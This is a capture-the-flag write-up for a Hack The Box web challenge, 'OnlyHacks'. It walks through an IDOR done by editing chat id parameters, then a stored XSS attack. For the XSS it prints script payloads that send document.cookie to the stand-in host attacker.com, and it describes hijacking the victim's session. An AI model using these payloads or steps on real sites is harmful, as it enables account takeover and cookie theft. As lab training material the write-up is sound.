search
Extra Notes

HTB-CTF {OnlyHacks}

hashtag
CHALLENGE DESCRIPTION

Dating and matching can be exciting, especially during Valentine's, but it’s important to stay vigilant for impostors. Can you help identify possible frauds?

hashtag
Challenge Information

  • Category: Web

  • Difficulty: Very Easy

  • Objective: Exploit web vulnerabilities to retrieve the flag.

  • Tag : IDOR , XSS

hashtag
Identifying Functionality

Upon accessing the OnlyHacks website, the following functionalities were observed:

  • Login Page (/login) – Users can log in using their credentials.

  • Registration Page (/register) – New users can sign up.

  • Dashboard (/dashboard) – Displays user profiles for matching.

  • Match Page (/chat) – Shows matched users and chat functionality.

/login page
/register page

hashtag
SOLUTION

hashtag
IDOR

hashtag
Vulnerability Analysis

  • The chat system was vulnerable to IDOR due to improper access control.

  • The chat endpoint used sequential numerical IDs, allowing an attacker to manipulate them.

  • By modifying the id parameter, retrieving another user's match details was possible, revealing the flag.

hashtag
Exploitation Steps

  1. Register and log in to the website.

  2. Like all profiles which only have 4 users.

/dashboard with option to like and reject

  1. Navigate to the /chat page.

/chat page. Only Retana matches

  1. The requested URL was observed as:

https://IPHTB/chat/?id=6

  1. Brute-force and get the 200 responses.

  2. Change id=6 to id=3

/id=3 reveal a flag.

  1. The response revealed the flag

hashtag
Stored Cross-Site Scripting (XSS) – Chat Exploit

hashtag
Vulnerability Analysis

  • The chat feature was vulnerable to Stored XSS, meaning malicious JavaScript was executed whenever another user viewed the chat.

  • This could be leveraged to steal session cookies and impersonate other users.

hashtag
Exploitation Steps

  1. Send testing payload in chat

For testing -- <h1>Hello</h1>

with testing paylaod.

  1. Send the following malicious XSS payload in chat.

<script>document.location="http://attacker.com/?cookie="+document.cookie</script>

<script>fetch(http://attacker.com/?cookie="+document.cookie)</script>

  1. When Retana views the chat, the script executes, sending their session cookie to the attacker.

response in webhook.

  1. Replace our session cookie with the stolen one.

changing the cookies to stolen one.

  1. Reloading the page logs the attacker into Retana’s account.

Impersonate as Retana and get the flag from Dimistris

Last updated